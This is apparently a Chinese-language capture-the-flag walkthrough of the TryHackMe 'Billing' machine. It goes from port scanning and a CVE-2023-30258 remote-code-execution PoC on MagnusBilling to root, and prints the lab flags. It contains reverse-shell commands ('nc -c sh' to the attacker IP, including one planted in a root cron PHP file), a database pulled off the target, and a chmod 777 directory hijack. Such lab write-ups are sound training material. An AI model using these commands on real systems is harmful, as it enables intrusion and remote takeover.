Billing
扫描端口
┌──(root㉿7)-[~/thm/Billing]
└─# nmap -A 10.10.15.214
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-25 20:33 CST
Nmap scan report for 10.10.15.214
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://10.10.15.214/mbilling/
| http-robots.txt: 1 disallowed entry
|_/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
扫描路由
┌──(root㉿7)-[~/thm/Billing]
└─# dirsearch -u http://10.10.15.214/mbilling/ -i 200
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/thm/Billing/reports/http_10.10.15.214/_mbilling__25-03-25_20-38-45.txt
Target: http://10.10.15.214/
[20:38:45] Starting: mbilling/
[20:40:03] 200 - 410B - /mbilling/assets/
[20:40:22] 200 - 4KB - /mbilling/CONTRIBUTING.md
[20:40:24] 200 - 0B - /mbilling/cron.php
[20:40:49] 200 - 332B - /mbilling/index.php
[20:40:57] 200 - 597B - /mbilling/lib/
[20:40:57] 200 - 7KB - /mbilling/LICENSE
[20:41:09] 200 - 2KB - /mbilling/modern.json
[20:41:09] 200 - 2KB - /mbilling/modern.jsonp
[20:41:33] 200 - 2KB - /mbilling/README.md
[20:41:36] 200 - 0B - /mbilling/resources/
[20:41:59] 200 - 408B - /mbilling/tmp/
MBilling 6.0.0.0
存在CVE-2023-30258可以RCE
n00o00b/CVE-2023-30258-RCE-POC: POC for CVE-2023-30258-RCE by n0o0b
反弹shell生成器生成反弹shell,一个个尝试,有些不行
python poc.py -u http://10.10.30.117/mbilling --cmd "nc -c sh 10.21.126.163 8888"
提高交互性
python3 -c 'import pty;pty.spawn("/bin/bash")'
[CTRL+Z]
stty raw -echo
fg
在家目录下发现数据库文件astdb.sqlite3
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd ~
asterisk@Billing:/var/lib/asterisk$ ls
agi-bin firmware moh scripts third-party
astdb.sqlite3 images phoneprov sounds
documentation keys rest-api static-http
asterisk@Billing:/var/lib/asterisk$ python3 -m http.server 6666
Serving HTTP on 0.0.0.0 port 6666 (http://0.0.0.0:6666/) ...
10.21.126.163 - - [25/Mar/2025 07:30:22] "GET /astdb.sqlite3 HTTP/1.1" 200 -
下下来发现加密了
passwd,有个magnus用户
asterisk@Billing:/var/lib/asterisk$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
tss:x:103:109:TPM software stack,,,:/var/lib/tpm:/bin/false
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:105:111:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:110:116:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
pulse:x:112:118:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
colord:x:114:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:115:123::/var/lib/geoclue:/usr/sbin/nologin
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
magnus:x:1000:1000:magnus,,,:/home/magnus:/bin/bash
asterisk:x:1001:1001:Asterisk PBX:/var/lib/asterisk:/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:117:125::/nonexistent:/usr/sbin/nologin
mysql:x:118:126:MySQL Server,,,:/nonexistent:/bin/false
-rw-r–r--直接可以拿到magnus的flag
asterisk@Billing:/var/lib/asterisk$ cd /home/*
asterisk@Billing:/home/magnus$ ls -al
total 76
drwxr-xr-x 15 magnus magnus 4096 Sep 9 2024 .
drwxr-xr-x 3 root root 4096 Mar 27 2024 ..
lrwxrwxrwx 1 root root 9 Mar 27 2024 .bash_history -> /dev/null
-rw------- 1 magnus magnus 220 Mar 27 2024 .bash_logout
-rw------- 1 magnus magnus 3526 Mar 27 2024 .bashrc
drwx------ 10 magnus magnus 4096 Sep 9 2024 .cache
drwx------ 11 magnus magnus 4096 Mar 27 2024 .config
drwx------ 3 magnus magnus 4096 Sep 9 2024 .gnupg
drwx------ 3 magnus magnus 4096 Mar 27 2024 .local
-rwx------ 1 magnus magnus 807 Mar 27 2024 .profile
drwx------ 2 magnus magnus 4096 Mar 27 2024 .ssh
drwx------ 2 magnus magnus 4096 Mar 27 2024 Desktop
drwx------ 2 magnus magnus 4096 Mar 27 2024 Documents
drwx------ 2 magnus magnus 4096 Mar 27 2024 Downloads
drwx------ 2 magnus magnus 4096 Mar 27 2024 Music
drwx------ 2 magnus magnus 4096 Mar 27 2024 Pictures
drwx------ 2 magnus magnus 4096 Mar 27 2024 Public
drwx------ 2 magnus magnus 4096 Mar 27 2024 Templates
drwx------ 2 magnus magnus 4096 Mar 27 2024 Videos
-rw-r--r-- 1 magnus magnus 38 Mar 27 2024 user.txt
asterisk@Billing:/home/magnus$ cat user.txt
THM{4a6831d5f124b25eefb1e92e0f0da4ca}
尝试sudo提权
asterisk@Billing:/home/magnus$ sudo -l
Matching Defaults entries for asterisk on Billing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on Billing:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
查看这个fail2ban-client用法,发现有CMD
COMMAND ACTION CONFIGURATION
set <JAIL> action <ACT> actionstart <CMD>
sets the start command <CMD> of
the action <ACT> for <JAIL>
set <JAIL> action <ACT> actionstop <CMD> sets the stop command <CMD> of the
action <ACT> for <JAIL>
set <JAIL> action <ACT> actioncheck <CMD>
sets the check command <CMD> of
the action <ACT> for <JAIL>
set <JAIL> action <ACT> actionban <CMD> sets the ban command <CMD> of the
action <ACT> for <JAIL>
set <JAIL> action <ACT> actionunban <CMD>
sets the unban command <CMD> of
the action <ACT> for <JAIL>
pspy64发现计划任务一直执行/bin/sh -c php /var/www/html/mbilling/cron.php
cron.php属于root,且无w权限
asterisk@Billing:/var/www/html/mbilling$ ls -l /var/www/html/mbilling/cron.php
-rwxr-xr-x 1 root root 0 Sep 12 2024 /var/www/html/mbilling/cron.php
但当前目录是属于asterisk
dr-xr-xr-x 36 asterisk asterisk 4096 Sep 12 2024 .
给写的权限
asterisk@Billing:/var/www/html/mbilling$ chmod 777 .
asterisk@Billing:/var/www/html/mbilling$ ls -la .
total 67012
drwxrwxrwx 36 asterisk asterisk 4096 Sep 12 2024 .
这样就能删除cron.php
然后重新写一个反弹shell
echo "<?=\`nc -c sh 10.21.126.163 9999\`;?>" >cron.php
监听
┌──(root㉿7)-[~/thm/Billing]
└─# nc -lvvp 9999
listening on [any] 9999 ...
10.10.30.117: inverse host lookup failed: Unknown host
connect to [10.21.126.163] from (UNKNOWN) [10.10.30.117] 47194
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
THM{33ad5b530e71a172648f424ec23fae60}
